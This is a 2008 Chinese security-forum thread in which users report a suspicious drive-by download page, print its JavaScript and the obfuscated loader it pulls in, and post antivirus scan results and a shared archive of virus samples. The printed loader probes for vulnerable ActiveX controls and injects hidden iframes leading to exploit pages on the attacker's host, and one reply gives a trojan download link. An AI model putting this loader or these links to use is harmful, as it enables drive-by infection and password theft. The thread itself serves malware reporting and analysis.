可疑网马一个

SONGBOWEN

URL：http://www.soongba.cn/gm.htm

里边的源代码：

1. <SCRIPT LANGUAGE="javascript">
   
2. var expires = new Date();
   
3. expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
   
4. var set_cookie = document.cookie.indexOf("3Warea=");
   
5. if (set_cookie == -1){document.cookie = "3Warea=1;expires=" + expires.toGMTString();
   
6. document.write("<script src=http:\/\/www.soongba.cn\/webx.asp><\/script>");}
   
7. </Script>

复制代码

http://www.soongba.cn/webx.asp的内容：

1. window.onerror=function(){return true;}
   
2.         try{
   
3.                 var e;
   
4.                 var Gf=document.createElement("\x6F\x62\x6A\x65\x63\x74");
   
5.                 Gf.setAttribute("\x63\x6C\x61\x73\x73\x69\x64","\x63\x6C\x73\x69\x64\x3A\x42\x44\x39\x36\x43\x35\x35\x36\x2D\x36\x35\x41\x33\x2D\x31\x31\x44\x30\x2D\x39\x38\x33\x41\x2D\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36");
   
6.                 var Ss=Gf.CreateObject("\x41\x64\x6F\x64\x62\x2E\x53\x74\x72\x65\x61\x6D","");
   
7.         }
   
8.         catch(e){};
   
9.         finally{
   
10.                 if(e!="[object Error]"){
    
11.         document.write("<iframe width='0' height='0' src='http://www.soongba.cn/Ms06014.htm'></iframe>");
    
12.                 }};
    
13. function test()
    
14. {
    
15. rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
    
16. try
    
17. {
    
18. Like = new ActiveXObject(rrooxx);
    
19. }catch(error){return;}
    
20. vvvvv = Like.PlayerProperty("PRODUCTVERSION");
    
21. if(vvvvv<="6.0.14.552")
    
22. document.write("<iframe width=0 height=0 src=http://www.soongba.cn/Real10.htm></iframe>");
    
23. else
    
24. document.write("<iframe width=0 height=0 src=http://www.soongba.cn/Real11.htm></iframe>");
    
25. }
    
26. test();
    
27. try{if(new ActiveXObject("GLIE"+"Down.IE"+"Down.1"))window["document"]["write"]("<iframe width='5' height='5' src='http://www.soongba.cn/Lzzx.htm'></iframe>")}catch(e){};
    
28. try{
    
29. var g;
    
30. var pppppppp=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");}
    
31. catch(g){};
    
32. finally{
    
33. if(g!="[object Error]"){
    
34. document.write("<iframe width='0' height='0' src='http://www.soongba.cn/pps.htm'></iframe>");}}
    

复制代码

granthill

http://www.wamamawa.cn/ok.exe

hahacomcn

Begin scan in 'C:\Documents and Settings\haha\桌面\ok.exe'
C:\Documents and Settings\haha\桌面\ok.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '488d2157.qua'  ( QUARANTINE )

tanlimo

这东西可以穿还原

virus（34个）.rar (506.67 KB, 下载次数: 114)

2008-6-23 12:24 上传

点击文件名下载附件

[ 本帖最后由 tanlimo 于 2008-6-23 12:24 编辑 ]

zhiyan

34个,nod32查杀28个

qigang

瑞星病毒查杀结果报告

清除病毒种类列表：

病毒： Trojan.Win32.Undef.ihm   

MAC 地址：00:11:5B:F3:6D:69

用户来源：互联网

软件版本：20.50.02

qigang

瑞星病毒查杀结果报告

清除病毒种类列表：

病毒： Trojan.PSW.Win32.GameOL.nvl
病毒： Trojan.PSW.Win32.ZhuXian.hx
病毒： Trojan.PSW.Win32.GameOL.ofo
病毒： Trojan.PSW.Win32.GameOL.oek
病毒： Trojan.PSW.Win32.GameOL.oda
病毒： Trojan.PSW.Win32.GameOL.oft
病毒： Trojan.PSW.Win32.GameOL.oci
病毒： Trojan.PSW.Win32.GameOL.odt
病毒： Trojan.PSW.Win32.Mapdimp.a
病毒： Trojan.Win32.Undef.ibx   
病毒： Trojan.PSW.Win32.ZeroOnline.dv
病毒： Trojan.PSW.Win32.ZhengTu.ynv
病毒： Trojan.PSW.Win32.RocOnline.lf
病毒： Trojan.Win32.Undef.ihm   
病毒： Dropper.Win32.Agent.gdv  

MAC 地址：00:11:5B:F3:6D:69

用户来源：互联网

软件版本：20.50.02